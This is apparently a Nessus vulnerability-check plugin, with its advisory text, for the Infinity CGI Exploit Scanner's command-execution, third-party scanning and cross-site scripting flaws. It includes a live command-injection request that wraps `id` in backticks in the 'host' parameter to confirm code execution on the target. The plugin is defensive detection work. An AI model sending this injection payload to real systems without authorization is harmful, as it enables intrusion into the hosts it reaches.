
Infinity CGI Exploit Scanner Multiple Vulnerabilities


The remote host is running Infinity Exploit Scanner, a web-based CGI vulnerability scanner implemented in Perl and installed under the name ‘nph-exploitscanget.cgi’.

There is a flaw in this CGI that lets an attacker execute arbitrary commands on this host.

In addition to this, there is a flaw in this CGI that could allow an attacker to use this CGI to scan third-party hosts by bypassing the policy set by the administrator of this CGI. This CGI is also vulnerable to cross-site scripting issues.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

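# Plugin registration. Nessus loads the script with `description` set to
# collect metadata; the live check further down only runs when it is unset.
if (description)
{
  script_id(11740);
  script_version("1.23");
  script_bugtraq_id(7910, 7911, 7913);

  script_name(english:"Infinity CGI Exploit Scanner Multiple Vulnerabilities");
  script_summary(english:"Checks for the presence of nph-exploitscanget.cgi");

  script_set_attribute(
    attribute:'synopsis',
    value:'The remote service is vulnerable to multiple flaws.'
  );

  # User-facing report text. The original read "The remote is running", which
  # dropped the noun; otherwise the wording is unchanged.
  script_set_attribute(
    attribute:'description',
    value:"The remote host is running Infinity Exploit Scanner, a web-based CGI vulnerability
scanner implemented in perl and stored under the name 'nph-exploitscanget.cgi'.

There is a flaw in this CGI that lets an attacker execute arbitrary
commands on this host.

In addition to this, there is a flaw in this CGI that could allow an attacker
to use this CGI to scan third-party hosts by bypassing the policy set by
the administrator of this CGI. This CGI is also vulnerable to
cross-site scripting issues."
  );

  script_set_attribute(
    attribute:'solution',
    value: "Upgrade Infinity Exploit Scanner to the latest version."
  );

  # Base vector: network, low complexity, no auth, partial C/I/A.
  # NOTE(review): the temporal vector's RL:U ("remediation unavailable") sits
  # uneasily with the "upgrade to the latest version" solution above — confirm
  # which one reflects the vendor's actual fix status.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(
    attribute:'see_also',
    value:'https://seclists.org/fulldisclosure/2003/Jun/412'
  );

  script_set_attribute(attribute:"plugin_publication_date", value: "2003/06/16");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_ATTACK: this is not a passive banner check — the test below injects a
  # command into the CGI and executes it on the target, so the plugin only
  # runs when the scan policy allows attack-category plugins. It is also
  # suppressed when CGI scanning is disabled via Settings/disable_cgi_scanning.
  script_category(ACT_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");

  script_dependencie("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  exit(0);
}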

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Resolve the web server port (Services/www discovery result, falling back
# to 80) and stop if it is not open.
port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);

# Active check. The `host` parameter is wrapped in backticks around `id`,
# which assumes the CGI hands that value to a shell unsanitized; a response
# containing uid=/gid= output confirms command execution. xss:1 makes the
# helper probe the same URL for reflected cross-site scripting as well.
# NOTE(review): this genuinely runs `id` on the target — not a version check.
url = strcat(
  "/nph-exploitscanget.cgi?host=`id`&port=", port,
  "&errchk=0&idsbypass=0"
);

http_check_remote_code(
  check_request:url,
  check_result:"uid=[0-9]+.*gid=[0-9]+.*",
  command:"id",
  xss:1
);